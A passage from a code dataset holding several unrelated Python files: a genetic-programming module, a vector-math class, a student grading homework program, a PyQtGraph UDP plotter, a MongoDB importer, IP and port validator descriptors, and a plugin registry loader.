1)\n\n\ndef next_level_size(k):\n \"\"\"Takes a tree size (number of nodes) k and returns the number of nodes\n that would be in the next deeper level\n \"\"\"\n d = get_depth(k)\n d = d + 1\n return 2 ** d\n\n\n\"\"\"Tree recombination and mutation functions for user use\"\"\"\n\n\ndef subtree_crossover(population, n, data):\n \"\"\"Takes a population, performs 2 tournament selections with sample size n,\n performs subtree crossover on the winners, and returns a new tree\n \"\"\"\n exception_occurred = False\n first_parent = tournament(population, n, data)\n second_parent = tournament(population, n, data) # This returned a None- probably because all programs failed\n # make tournament recursive\n choice1 = random()\n choice2 = random()\n if choice1 < 0.9:\n try:\n cross_pt1 = first_parent.get_rand_function()\n except NodeSelectionError:\n exception_occurred = True\n else:\n cross_pt1 = first_parent.get_rand_terminal()\n\n if choice2 < 0.9:\n try:\n cross_pt2 = second_parent.get_rand_function()\n except NodeSelectionError:\n exception_occurred = True\n else:\n cross_pt2 = second_parent.get_rand_terminal()\n\n if exception_occurred == False:\n return _crossover(first_parent, second_parent, cross_pt1, cross_pt2)\n\n return subtree_crossover(population, n, data)\n\n\ndef subtree_mutation(tree, max_depth):\n \"\"\"Takes in a tree and parameters for generating a new tree, and returns\n a copy of the original tree with a subtree replaced by the new tree\n \"\"\"\n p = tree.primitives\n s = tree.set_dict\n init_options = ['full', 'grow']\n subtree = BinaryTree(p, s, choice(init_options), randint(0, max_depth))\n return _crossover(tree, subtree, tree.get_rand_node(), 0)\n\n\ndef point_mutation():\n pass\n\n\ndef reproduction(population, n, data):\n \"\"\"Performs a single tournament selection and returns a copy of the most\n fit individual\n \"\"\"\n winner = tournament(population, n, data)\n return deepcopy(winner)\n\n\n\"\"\"Functions used in fitness evaluation, recombination, and mutation\"\"\"\n\n\ndef fitness(tree, dataset):\n \"\"\"variables is a list of strings denoting variable names, and dataset is\n a list of tuples of floats denoting variable values\n \"\"\"\n prog = tree.build_program()\n variables = tree.set_dict[\"variables\"]\n m = len(variables)\n tot_err = 0\n for item in dataset:\n for i in range(m):\n vars()[variables[i]] = item[i]\n try:\n dvar_actual = item[-1]\n dvar_calc = eval(prog)\n err = abs(dvar_actual - dvar_calc)\n tot_err = tot_err + err\n except ZeroDivisionError:\n raise SingularityError\n except OverflowError:\n raise UnfitError\n\n return tot_err\n\n\ndef tournament(population, n, data):\n \"\"\"Performs tournament selection, randomly choosing n individuals from the\n population and thunderdome-ing it, returning the individual with the best\n fitness\n \"\"\"\n pop_sample = sample(population, n)\n best = None\n best_score = None\n for item in pop_sample:\n try:\n score = fitness(item, data)\n if (best_score == None) or (score < best_score):\n best = item\n best_score = score\n except SingularityError:\n pass\n except UnfitError:\n pass\n\n if best == None:\n return tournament(population, n, data)\n\n return best\n\n\ndef _crossover(tree1, tree2, cross_pt1, cross_pt2):\n \"\"\"Takes two tree objects and a crossover index on each and returns a copy\n of the first tree with the subtree rooted at the first crossover point\n replaced by the subtree rooted at the second point on the second tree\n \"\"\"\n tree1copy = deepcopy(tree1)\n tree2copy = deepcopy(tree2)\n sub = tree2copy.get_subtree(cross_pt2)\n tree1copy.replace_subtree(cross_pt1, sub)\n return tree1copy\n\n\ndef termination_test(population, data):\n \"\"\"Tests the fitness of every member of the population, returning the\n individual with the best fitness and that fitness as a tuple\n \"\"\"\n pop_sample = sample(population, len(population)-1)\n best = None\n best_score = None\n for item in pop_sample:\n try:\n score = fitness(item, data)\n if (best_score == None) or (score < best_score):\n best = item\n best_score = score\n except SingularityError:\n pass\n except UnfitError:\n pass\n\n return best, best_score\n\n##Another method that extracts headers and passes a tuple for automatic variable\n##generation; could import a data file as a list of tuples and then use pop to\n##return the headers\n","sub_path":"pygp.py","file_name":"pygp.py","file_ext":"py","file_size_in_byte":13055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"38965481","text":"from sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import sessionmaker\n\n\ndef table_init(engine, name):\n Base = automap_base()\n Base.prepare(engine, reflect=True)\n DBSession = sessionmaker(bind=engine)\n session = DBSession()\n return getattr(Base.classes, name), session\n","sub_path":"stock_increment_tools/files/config/table_init.py","file_name":"table_init.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"348088201","text":"\"\"\"\nSimple command line functions for taking text copied from espacenet and cleaning it for use in a form.\n\"\"\"\n\n\n\ndef flipdate(date):\n \"\"\"\n Flips an x-y-z format date string into a z-y-x format date string.\n\n :param date: a string that represents a date in any x-y-z format.\n :return: a string representing the same date in z-y-x format.\n \"\"\"\n\n date = date.split(\"-\")\n date.reverse()\n return \"-\".join(date)\n\n\ndef clean_compact_family_text(famtext, flip=True):\n \"\"\"\n Takes the string copied from the espacenet page showing a compact family and cleans it up for use in an ISR.\n\n :param famtext: string copied from the espacenet fampat compact family listing\n :return: a list of the family members in a format suitable for the ISR.\n \"\"\"\n\n list01 = famtext.split(\"\\n\")\n list01 = [l.strip() for l in list01]\n list02 = [l.replace(\"(\",\"\").replace(\")\",\"\") for l in list01]\n list03 = [l for l in list02 if not l[0].isdigit() and \"info\" not in l]\n for l in list03:\n l = l.split(\"\\t\")\n date = flipdate(l[1]) if flip else l[1]\n print(\"\\t\"*6 + l[0] + \"\\t\\t\" + date)","sub_path":"espacenet_scraping.py","file_name":"espacenet_scraping.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"450174659","text":"from math import acos, cos, sqrt, pi\nfrom decimal import getcontext\nfrom decimal import Decimal as dec\n\ngetcontext().prec = 30\n\nclass Vector(object):\n \n CANNOT_NORMALIZE_ZERO_VECTOR_MSG = \"Cannot normalize zero vector\"\n NO_UNIQUE_COMPONENT_PARALLEL_MSG = \"There is no unique parallel component to the zero vector\"\n PRECISION = 5\n TOLERANCE = 1e-10\n \n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([round(dec(x), self.PRECISION) for x in coordinates])\n self.dimension = len(self.coordinates)\n\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n \n @property\n def magnitude(self) -> dec:\n '''Returns magnitude (length) of this vector'''\n return dec(sqrt(sum([x**dec('2.0')for x in self.coordinates])))\n \n @property\n def normalized(self):\n '''Returns normalized coordinates for this vector'''\n if float(self.magnitude) == 0:\n raise ZeroDivisionError(self.CANNOT_NORMALIZE_ZERO_VECTOR_MSG)\n return self.times_scalar(dec(\"1.0\")/self.magnitude)\n \n @property\n def is_zero_vector(self, tolerance=TOLERANCE):\n '''Returns True if this vector is the zero vector, False if not'''\n return self.magnitude < tolerance\n\n def __add_zero_dimension(self):\n '''Returns vector that is identical to self but with additional 0 coordinate'''\n new_coords = [float(x) for x in self.coordinates]\n new_coords.append(0.0)\n return Vector(new_coords)\n \n def cross(self, vector):\n '''Returns a Vector which is the cross product of this vector and the referenced one'''\n try: \n assert 2 <= self.dimension <= 3 and 2 <= vector.dimension <= 3\n except AssertionError:\n raise AssertionError(\"Vectors must be of dimension 2 or 3 to use cross product\")\n v_self = self.__add_zero_dimension() if self.dimension == 2 else Vector(self.coordinates) \n w_vector = vector.__add_zero_dimension() if vector.dimension == 2 else Vector(vector.coordinates)\n\n cross_coords = []\n cross_coords.append((v_self.coordinates[1] * w_vector.coordinates[2]) - (w_vector.coordinates[1] * v_self.coordinates[2]))\n cross_coords.append(-((v_self.coordinates[0] * w_vector.coordinates[2]) - (w_vector.coordinates[0] * v_self.coordinates[2])))\n cross_coords.append((v_self.coordinates[0] * w_vector.coordinates[1]) - (w_vector.coordinates[0] * v_self.coordinates[1]))\n\n return Vector(cross_coords)\n\n\n def area_of_parallelogram_with(self, vector):\n return round((self.cross(vector).magnitude), self.PRECISION)\n\n def area_of_triangle_with(self, vector):\n return round((self.area_of_parallelogram_with(vector)) / dec(\"2\"), self.PRECISION)\n\n def component_orthogonal_to(self, basis):\n '''Returns the component of this vector that is orthogonal to the basis vector'''\n try:\n projection = self.component_parallel_to(basis)\n return self.minus(projection)\n except Exception as e:\n if str(e) == self.NO_UNIQUE_COMPONENT_PARALLEL_MSG:\n raise Exception(self.NO_UNIQUE_COMPONENT_PARALLEL_MSG)\n else:\n raise e\n \n def component_parallel_to(self, basis):\n '''Returns the component of this vector that is parallel to the basis vector'''\n try:\n u = basis.normalized\n weight = self.dot(u)\n return u.times_scalar(weight)\n except Exception as e:\n if str(e) == self.CANNOT_NORMALIZE_ZERO_VECTOR_MSG:\n raise Exception(self.NO_UNIQUE_COMPONENT_PARALLEL_MSG)\n else:\n raise e\n \n def is_orthogonal_to(self, vector, tolerance=TOLERANCE):\n '''Returns True if referenced vector is orthagonal to this one, otherwise False'''\n return abs(self.dot(vector)) < tolerance\n \n def is_parallel_to(self, vector):\n '''Returns True if referenced vector is parallel to this one, otherwise False'''\n if self.is_zero_vector or vector.is_zero_vector: return True\n return (self.degrees_from(vector)==0 or self.degrees_from(vector)==pi)\n \n def plus(self, vector):\n '''Returns a Vector which is the result of adding vector to this one.'''\n if vector.dimension != self.dimension:\n raise ValueError(f\"Vectors must have of dimension {vector.dimension} \\\n to be added to this vector\")\n \n new_coordinates = [x + y for x, y in zip(self.coordinates, vector.coordinates)]\n return Vector(new_coordinates)\n \n def minus(self, vector):\n '''Returns a vector which is the result of subtracting a vector from this one.'''\n if vector.dimension != self.dimension:\n raise ValueError(f\"Vectors must have of dimension {vector.dimension} \\\n to be added to this vector\")\n \n new_coordinates = [x - y for x, y in zip(self.coordinates, vector.coordinates)]\n return Vector(new_coordinates)\n \n def times_scalar(self, scalar: float):\n '''Returns a Vector which is the result of multiplying this vector by a scalar'''\n new_coordinates = [x * dec(scalar) for x in self.coordinates]\n return Vector(new_coordinates)\n \n def dot(self, vector):\n '''Returns the dot product of this vector and the referenced vector'''\n return sum([x * y for x, y in zip(self.coordinates, vector.coordinates)])\n \n def radians_from(self, vector):\n '''Returns angle in radians between this vector and the referenced vector'''\n try:\n u1 = self.normalized\n u2 = vector.normalized\n except Exception as e:\n if str(e) == self.CANNOT_NORMALIZE_ZERO_VECTOR_MSG:\n raise Exception(\"Cannot compute an angle with the zero vector\")\n else:\n raise e\n return acos(u1.dot(u2))\n \n def degrees_from(self, vector):\n '''Returns angle in degrees between this vector and the referenced vector'''\n return dec(self.radians_from(vector))*(dec(\"180\")/dec(f\"{pi}\"))\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n\n\n def __eq__(self, v):\n return self.coordinates == v.coordinates\n","sub_path":"vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375010288","text":"import shutil\ntotal_weight=0\nclass assigmnet:\n def __init__(self, assignment_num, assignment_name):\n self.__assignment_name=assignment_name\n self.__assignment_num=assignment_num\n\n @property\n def assignment_name(self):\n return self.__assignment_name\n @property\n def assignment_num(self):\n return self.__assignment_num\n \n @assignment_name.setter\n def assignment_name(self, assignment_name):\n self.__assignment_name=assignment_name\n\n @assignment_num.setter\n def assignment_num(self, assignment_num):\n self.__assignment_num=assignment_num\n\n def display(self):\n print(\"Assignment Name:\"+str(self.assignment_name)+\"\\nAssignment Num:\"+str(self.assignment_num))\n return\n\n\n\n\nclass Semester(assigmnet):\n def __init__(self, assignment_name=None,assignment_num=None, test=None, exam=None, weight=None):\n super().__init__(assignment_name,assignment_num)\n self.__test=test\n self.__exam=exam\n self.__weight=weight\n self.total_weight=total_weight\n \n #@property\n #def assignment(self):\n # return self.__assignment\n #@property\n #def assignment_num(self):\n # return self.__assignment_num\n #@assignment.setter\n #def assignment(self, assignment):\n # self.__assignment=assignment\n\n @property\n def test(self):\n return self.__test\n @test.setter\n def test(self, test):\n self.__test=test\n\n @property\n def exam(self):\n return self.__exam\n @exam.setter\n def exam(self, exam):\n self.__exam=exam\n\n @property\n def weight(self):\n self.__weight\n @weight.setter\n def weight(self, weight):\n self.__weight=weight\n \n g=open(\"Policy\",'w')\n g.write(\"Assignment Num \\t\\t\\t Assignment Name \\t\\t\\t Exam Score\")\n g.close()\n #add assignment\n def add_assignment(self,weight, assignment_num:list(range(4)), assignment_name:list(range(4))):\n global total_weight\n total_weight=total_weight+weight\n print(total_weight)\n if total_weight>101:\n raise ValueError \n \n self.assignment=weight,assignment_num,assignment_name\n g=open(\"Policy\", 'a')\n g.write(\"\\n\\nAssignmnet Num \\t\\t Assignment Name \\t\\t Assignment Wight\\n\"+str(self.assignment[2])+\" \\t\\t\\t\\t\\t\\t \"+str(self.assignment[1])+\" \\t\\t\\t\\t\\t \"+str(self.assignment[0]))\n g.close()\n \n \n return self.assignment\n \n g=open(\"Policy\",'w')\n g.write(\"Assignment Num \\t\\t\\t Assignment Name \\t\\t\\t Exam Score\")\n g.close() \n #add test\n def add_test(self, weight, test_num:list(range(4)), test_name:list(range(4))):\n global total_weight\n total_weight=total_weight+weight\n print(total_weight)\n if total_weight>101:\n raise ValueError \n self.test=test_num, test_name,weight\n g=open(\"Policy\", 'a')\n g.write(\"\\n\\nTest Num \\t\\t Test Name \\t\\t Test Wight\\n\"+str(self.test[0])+\" \\t\\t\\t\\t \"+str(self.test[1])+\" \\t\\t\\t \"+str(self.test[2]))\n g.close()\n return self.test\n g=open(\"Policy\",'w')\n g.write(\"Assignment Num \\t\\t\\t Assignment Name \\t\\t\\t Exam Score\")\n g.close()\n def add_exam(self, weight,exam_num:list(range(1)), exam_name:list(range(1))):\n global total_weight\n total_weight=total_weight+weight\n print(total_weight)\n if total_weight>101:\n raise ValueError \n self.exam=exam_num, exam_name, weight\n g=open(\"Policy\", 'a')\n g.write(\"\\n\\nExam Num \\t\\t Exam Name \\t\\t Exam Wight\\n\"+str(self.exam[0])+\" \\t\\t\\t\\t\\t\\t \"+str(self.exam[1])+\" \\t\\t\\t\\t\\t \"+str(self.exam[2]))\n g.close()\n return self.exam\n \n def calculate_weight(self):\n self.weight=self.assignment[2]+self.test[2]+self.exam[2]\n if self.weight<=100:\n print(\"Your Wieght is balance\")\n else:\n print(\"Your Weightage is unbalance please modify your Weight\")\n g=open(\"Policy\", 'r')\n print(g)\n return self.weight\n \n \n \n #Test\n def display(self):\n print( \"Assignment Num: \"+str(self.assignment[0])+\"\\nAssignment Name: \"+str(self.assignment[1]))\n #test=print( \"Test Num: \"+str(self.test_num)+\"\\nTest Name: \"+str(self.test_num))\n\n\n\nclass Student:\n def __init__(self, student_id=None, student_fname=None, student_lname=None):\n self.__student_id=student_id\n self.__student_fname=student_fname\n self.__student_lname=student_lname\n\n @property\n def student_id(self):\n return self.__student_id\n @student_id.setter\n def student_id(self, student_id):\n self.__student_id=student_id\n\n @property\n def student_fname(self):\n return self.__student_fname\n @student_fname.setter\n def student_fname(self, student_fname):\n self.__student_fname=student_fname\n\n @property\n def student_fname(self):\n return self.__student_fname\n @student_fname.setter\n def student_fname(self, student_fname):\n self.__student_fname=student_fname\n\n def add_student(self, student_id, student_fname, student_lname):\n self.student=(student_id,student_fname,student_lname)\n\n return self.student\n\n def __student__(self):\n self.__student_id\n self.__student_fname\n self.__student_lname\n\n return self.__student__\n\n \n def display(self):\n print(\"Student ID: \"+str(self.student_id)+\"\\nStudent First Name: \"+str(self.student_fname)+\"\\nStudent Last Name: \"+str(self.__student_lname))\n \n\nclass score(Semester, Student):\n \n \n \n \n\n @property\n def score(self):\n return self.__score\n\n @score.setter\n def score(self, score):\n self.__score=score\n\n \n\n def add_assignment_score(self):\n \n validate=input(\"Enter Assignment number: \")\n if validate == super().assignment_num:\n for student_id in self.__student__:\n self.score=float(input(\"Enter Score for \")+str(student_id))\n score<=100\n return None\n\n def display(self):\n print( \"Student ID: \"+str(self.score[1])+\"\\n added Score\\n Assignment Num: \"+str(self.score[0])+\"\\nAssigment Score: \"+str(self.score[2]))\n\nclass exam_score(Semester, Student):\n def __init__(self, student_id=None, test=None, exam=None, test_score=None, exam_score=None,student=None):\n super().__init__(test, exam,student_id)\n self.__test_score=test_score\n self.__exam_score=exam_score\n self.student_id=student_id\n self.student=Student.add_student\n\n @property\n def test_score(self):\n return self.__test_score\n @test_score.setter\n def test_score(self, test_score):\n self.__test_score=test_score\n\n @property\n def exam_score(self):\n return self.__exam_score\n @exam_score.setter\n def exam_score(self, exam_score):\n self.__exam_score=exam_score\n\n\n def S_id(self):\n return Student.student_id\n\n g=open(\"Grade\",'w')\n g.write(\"Student ID \\t\\t Test Name \\t\\t Test Score\")\n g.close()\n def add_test_score(self, student_id, test, test_score):\n \n self.test_score=(student_id, test, test_score)\n g=open(\"Grade\",'a')\n g.write(\"\\n\"+str(self.test_score[0])+\"\\t\\t\\t\\t\\t\\t\"+str(self.test_score[1])+\"\\t\\t\\t\\t\\t\\t\"+str(self.test_score[2]))\n g.close()\n print(\"Student ID: \"+str(self.test_score[0])+\"\\nTest Name: \"+str(self.test_score[1])+\"\\nTest Score: \"+str(self.test_score[2]))\n return self.test_score\n\n\n\n g=open(\"Grade\",'w')\n g.write(\"Student ID \\t\\t\\t Exam Name \\t\\t\\t Exam Score\")\n g.close()\n def add_exam_score(self, student_id, exam, exam_score):\n \n self.exam_score=student_id,exam,exam_score\n g=open(\"Grade\",'a')\n g.write(\"\\n\"+str(self.exam_score[0])+\"\\t\\t\\t\\t\\t\\t\"+str(self.exam_score[1])+\"\\t\\t\\t\\t\\t\\t\"+str(self.exam_score[2]))\n g.close()\n \n \n return self.exam_score\n \n \n \n def test_display(self):\n print()\n \n \n def exam_save(self):\n print()\n \n \n\n \n \n\n \n\n \n\ndef main():\n #Tester \n #st=assigmnet(1,\"Java\")\n #st.add_assignment(2,\"Java ad\")\n #st2=Semester(1,\"Java\",\"test\",\"exam\",100)\n #st2.add_assignment(2,\"Java ad\",11)\n #st2.display()\n #st2=Student(19549,\"Patel\",\"Jenish\")\n #st2.display()\n \n #st2.add_test(20,1,\"Test1\")\n #st2.display()\n #s2=score()\n #s2.add_assignment_score()\n #st2=exam_score()\n #st2.add_test_score(18762, \"Mid1\", 54)\n #st2.add_test_score(19549, \"Mid1\", 66)\n #st2.add_exam_score(Student.student_id, \"E1\", 78)\n \n \n \n #st1.display()\n #st2=score()\n #st2.add_assignment_score(st2.assignment_name,st2.student_id,23)\n #st2.display()\n #st2=exam_score()\n #st2.add_test_score(st2.student_id,st2.test,45)\n #st2.test_display()\n \n \n\n \n while KeyboardInterrupt:\n print(\"1:Add Assignments\\n2:Add Test\\n3:Add Exam\\n4:calculate the wightage\\n5:Add Student\\n6:Add Score to Assigmnet\\n7:Add score to Test\\n8:Add score to exam\\n9:Save the file \")\n user_input=int(input(\"Please choice following Menu: \"))\n \n if(user_input == 1):\n try:\n s=Semester()\n s.add_assignment(float(input(\"Enter Weight: \")),input(\"Add assingment name: \"), input(\"Enter assignment num: \"))\n except ValueError: \n g=open(\"Policy\",'r')\n print(g.read())\n print(\"\\nWARNING\\nThe Weight is Unbalance Please ENTER AGAIN\")\n s.add_assignment(float(input(\"Enter Weight: \")),input(\"Add assingment name: \"), input(\"Enter assignment num: \"))\n \n \n \n elif(user_input == 2):\n try:\n s=Semester()\n s.add_test(float(input(\"Enter Weight: \")), int(input(\"Enter Test num: \")), input(\"Enter Test name: \"))\n except ValueError: \n g=open(\"Policy\",'r')\n print(g.read())\n print(\"\\nWARNING\\nThe Weight is Unbalance Please ENTER AGAIN\")\n s.add_assignment(float(input(\"Enter Weight: \")),input(\"Add assingment name: \"), input(\"Enter assignment num: \"))\n elif(user_input == 3):\n try:\n s=Semester()\n s.add_exam(float(input(\"Enter Weight: \")), int(input(\"Enter exam num: \")), input(\"Enter Exam name: \"))\n except ValueError: \n g=open(\"Policy\",'r')\n print(g.read())\n print(\"\\nWARNING\\nThe Weight is Unbalance Please ENTER AGAIN\")\n s.add_assignment(float(input(\"Enter Weight: \")),input(\"Add assingment name: \"), input(\"Enter assignment num: \"))\n elif(user_input==4):\n Semester.calculate_weight()\n elif(user_input==5):\n w=Student()\n w.add_student(int(input(\"Enter a StudentId: \")), input(\"Enter Student First name: \"), input(\"Enter Student Last name: \"))\n elif((user_input==6)):\n s=score()\n s.add_assignment(int(input(\"Enter wight: \")), input(\"Enter Student First Name: \"), input(\"Enter Last name: \"))\n elif(user_input==7):\n s=exam_score()\n s.add_test_score(int((input(\"Enter Student id: \"))),input(\"Test name: \"), int(input(\"Exam score: \")))\n break\n elif(user_input==8):\n s=exam_score()\n s.add_exam_score(int((input(\"Enter Student id: \"))),input(\"Exam name: \"), int(input(\"Exam score: \")))\n\n elif(user_input==9):\n seen = set()\n with open('Grade') as f, open('Grade1','w') as o:\n for line in f:\n if not line.isspace() and not line in seen:\n o.write(line)\n seen.add(line)\n \n\n else:\n print(\"Error\")\n \n \n\n\n \n\n\n\n\n\n\n\n\nmain()\n","sub_path":"HW6/Hw61.py","file_name":"Hw61.py","file_ext":"py","file_size_in_byte":12369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"284271727","text":"from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\nimport socket\nimport struct\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n \n self.c = 0\n self.x = []\n self.y = []\n self.x1 = []\n self.y1 = []\n self.pack = struct.pack(\">3c8f\",b\"C\",b\"2\",b\"H\", 500, 0.006, 10,\n 1,5,1,5,60)\n\n self.sock_recv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock_recv.bind(('127.0.0.1',5550))\n\n\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(10) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.onNewData)\n\n self.plotItem = self.addPlot(title=\"Points_Force\")\n\n self.plotDataItem = self.plotItem.plot([], pen=None, \n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n \n ####\n self.plotItem1 = self.addPlot(title=\"Points_Pos\")\n\n self.plotDataItem1 = self.plotItem1.plot([], pen=None, \n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n \n\n def setData(self, x, y):\n self.plotDataItem.setData(x, y)\n \n def setData1(self, x, y):\n self.plotDataItem1.setData(x, y)\n\n\n\n def onNewData(self):\n self.sock_send.sendto(self.pack,('127.0.0.1',5500))\n data, ip = self.sock_recv.recvfrom(1024)\n data = struct.unpack(\">3c2f\",data)\n F = data[3]\n Pos = data[4]\n self.x.append(self.c) \n self.y.append(F)\n #c += 1\n self.c += 1\n self.x1.append(self.c)\n self.y1.append(Pos)\n self.setData(self.x, self.y)\n self.setData1(self.x1,self.y1)\n\ndef main():\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n win = MyWidget()\n win.show()\n win.resize(800,600) \n win.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"legacy/echo/plot_f_udp.py","file_name":"plot_f_udp.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642007910","text":"from pymongo import MongoClient\nimport json\nimport pdb\n\ndef dbImport(_f):\n client = MongoClient()\n riot = client.riot\n\n for k, v in _f.iteritems():\n coll = '%s' % (k)\n for _k, _v in v.iteritems():\n coll = '%s_%s' % (k, _k)\n coll = coll.lower()\n coll = riot[coll]\n try:\n for game in _v['100']:\n game['winner'] = 100\n coll.insert_one(game)\n\n for game in _v['200']:\n game['winner'] = 200\n coll.insert_one(game)\n except Exception:\n continue\n\ndef main():\n _f = json.loads(open('./riot.json', 'r').read())\n dbImport(_f)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dbimport.py","file_name":"dbimport.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"201848721","text":"import logging\nimport socket\nfrom additionals.decos import Log\nfrom .check_ip import check_first_octet, check_second_third_octets, check_forth_octet, check_ip\n\n\nlogger = logging.getLogger('app.server_')\n\n\n@Log()\nclass PortVerifier:\n \"\"\"\n check for ip port\n \"\"\"\n def __set__(self, instance, value):\n if value < 1024 or value > 65535:\n logger.error(f'invalid port number {value}')\n raise ValueError(f'port is out off range 1024 - 65535, u typed {value}')\n instance.__dict__[self.name] = value\n\n def __set_name__(self, owner, name):\n self.name = name\n\n\n@Log()\nclass HostVerifier:\n \"\"\"\n check for ip address\n \"\"\"\n def __set__(self, instance, value):\n if not check_ip(value):\n try:\n ip = socket.gethostbyname(value)\n sliced_ip = ip.split('.')\n except ValueError:\n logger.error(f'ip address is incorrect {value}')\n\n else:\n sliced_ip = value.split('.')\n\n if len(sliced_ip) == 4:\n for el in range(0, 4):\n if el == 0 and check_first_octet(sliced_ip[el]) \\\n or 0 < el < 3 and check_second_third_octets(sliced_ip[el]) \\\n or el == 3 and check_forth_octet(sliced_ip[el]):\n pass\n else:\n logger.error(f'ip is incorrect {value}')\n raise ValueError('ip is incorrect')\n else:\n logger.error(f'ip is incorrect {value}')\n raise ValueError('ip is incorrect')\n\n instance.__dict__[self.name] = value\n\n def __set_name__(self, owner, name):\n self.name = name\n\n\n\n","sub_path":"part_2/lesson_7/additionals/server_descriptor.py","file_name":"server_descriptor.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"39117998","text":"from asyncio import coroutines, ensure_future\nimport concurrent.futures\nimport voluptuous as vol\nfrom abc import ABC\nimport threading\nimport logging\nimport inspect\nimport importlib\nimport pkgutil\n\n_LOGGER = logging.getLogger(__name__)\n\ndef async_fire_and_forget(coro, loop):\n \"\"\"Run some code in the core event loop without a result\"\"\"\n\n if not coroutines.iscoroutine(coro):\n raise TypeError(('A coroutine object is required: {}').format(coro))\n\n def callback():\n \"\"\"Handle the firing of a coroutine.\"\"\"\n ensure_future(coro, loop=loop)\n\n loop.call_soon_threadsafe(callback)\n return\n\ndef async_callback(loop, callback, *args):\n \"\"\"Run a callback in the event loop with access to the result\"\"\"\n\n future = concurrent.futures.Future()\n def run_callback():\n try:\n future.set_result(callback(*args))\n # pylint: disable=broad-except\n except Exception as e:\n if future.set_running_or_notify_cancel():\n future.set_exception(e)\n else:\n _LOGGER.warning(\"Exception on lost future: \", exc_info=True)\n\n loop.call_soon_threadsafe(run_callback)\n return future\n\ndef hasattr_explicit(cls, attr):\n \"\"\"Returns if the given object has explicitly declared an attribute\"\"\"\n try:\n return getattr(cls, attr) != getattr(super(cls, cls), attr, None)\n except AttributeError:\n return False\n\ndef getattr_explicit(cls, attr, *default):\n \"\"\"Gets an explicit attribute from an object\"\"\"\n\n if len(default) > 1:\n raise TypeError(\"getattr_explicit expected at most 3 arguments, got {}\".format(\n len(default) + 2))\n\n if hasattr_explicit(cls, attr):\n return getattr(cls, attr, default)\n if default:\n return default[0]\n\n raise AttributeError(\"type object '{}' has no attribute '{}'.\".format(\n cls.__name__, attr))\n\nclass BaseRegistry(ABC):\n \"\"\"\n Base registry class used for effects and devices. This maintains a\n list of automatically registered base classes and assembles schema\n information\n\n The prevent registration for classes that are intended to serve as \n base classes (i.e. GradientEffect) add the following declarator:\n @Effect.no_registration\n \"\"\"\n _schema_attr = 'CONFIG_SCHEMA'\n\n def __init_subclass__(cls, **kwargs):\n \"\"\"Automatically register the class\"\"\"\n super().__init_subclass__(**kwargs)\n\n if not hasattr(cls, '_registry'):\n cls._registry = {}\n\n name = cls.__module__.split('.')[-1]\n cls._registry[name] = cls\n\n @classmethod\n def no_registration(self, cls):\n \"\"\"Clear registration entiry based on special declarator\"\"\"\n\n name = cls.__module__.split('.')[-1]\n del cls._registry[name]\n return cls\n\n @classmethod\n def schema(self, extended=True, extra=vol.ALLOW_EXTRA):\n \"\"\"Returns the extended schema of the class\"\"\"\n\n if extended is False:\n return getattr_explicit(type(self), self._schema_attr, vol.Schema({}))\n\n schema = vol.Schema({}, extra=extra)\n classes = inspect.getmro(self)[::-1]\n for c in classes:\n c_schema = getattr_explicit(c, self._schema_attr, None)\n if c_schema is not None:\n schema = schema.extend(c_schema.schema)\n\n return schema\n\n @classmethod\n def registry(self):\n \"\"\"Returns all the subclasses in the registry\"\"\"\n\n return self._registry\n\n @property\n def id(self):\n \"\"\"Returns the id for the object\"\"\"\n return getattr(self, '_id', None)\n\n @property\n def type(self):\n \"\"\"Returns the id for the object\"\"\"\n return getattr(self, '_type', None)\n\n @property\n def config(self):\n \"\"\"Returns the config for the object\"\"\"\n return getattr(self, '_config', None)\n\nclass RegistryLoader(object):\n \"\"\"Manages loading of compoents for a given registry\"\"\"\n\n def __init__(self, cls, package, ledfx):\n self._package = package\n self._ledfx = ledfx\n self._cls = cls\n self._objects = {}\n self._object_id = 1\n\n self.import_registry(package)\n\n def import_registry(self, package):\n \"\"\"\n Imports all the modules in the package thus hydrating\n the registry for the class\n \"\"\"\n\n found = self.discover_modules(package)\n _LOGGER.info(\"Importing {} from {}\".format(found, package))\n for name in found:\n importlib.import_module(name)\n\n def discover_modules(self, package):\n \"\"\"Discovers all modules in the package\"\"\"\n module = importlib.import_module(package)\n \n found = []\n for _, name, _ in pkgutil.iter_modules(module.__path__, package + '.'):\n found.append(name)\n \n return found\n\n def __iter__(self):\n return iter(self._objects)\n\n def types(self):\n \"\"\"Returns all the type strings in the registry\"\"\"\n return 